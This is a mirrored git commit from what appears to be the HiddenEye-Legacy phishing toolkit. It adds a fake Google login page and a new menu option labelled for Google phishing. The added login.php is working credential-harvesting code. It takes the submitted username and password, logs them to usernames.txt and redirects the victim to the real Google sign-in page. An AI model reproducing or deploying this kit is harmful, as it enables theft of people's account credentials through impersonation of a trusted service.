mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #8 from usama7628674/master
new google page merged...
This commit is contained in:
commit
c8b28cc982
|
@ -84,7 +84,9 @@ def runPhishing(social, option2):
|
|||
elif option2 == '1' and social == 'Google':
|
||||
system('cp WebPages/google_standard/*.* Server/www/')
|
||||
elif option2 == '2' and social == 'Google':
|
||||
system('cp WebPages/google_advanced_poll/*.* Server/www/')
|
||||
system('cp WebPages/google_advanced_poll/*.* Server/www/')
|
||||
elif option2 == '3' and social == 'Google':
|
||||
system('cp WebPages/google_advanced_web/*.* Server/www/')
|
||||
elif social == 'LinkedIn':
|
||||
system('cp WebPages/linkedin/*.* Server/www/')
|
||||
elif social == 'GitHub':
|
||||
|
@ -170,7 +172,7 @@ def runPEnv():
|
|||
runPhishing('Facebook', option2)
|
||||
elif option == '2':
|
||||
loadModule('Google')
|
||||
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
runPhishing('Google', option2)
|
||||
elif option == '3':
|
||||
loadModule('LinkedIn')
|
||||
|
|
1600
WebPages/google_advanced_web/index.php
Normal file
1600
WebPages/google_advanced_web/index.php
Normal file
File diff suppressed because one or more lines are too long
14
WebPages/google_advanced_web/login.php
Normal file
14
WebPages/google_advanced_web/login.php
Normal file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://accounts.google.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
Loading…
Reference in New Issue
Block a user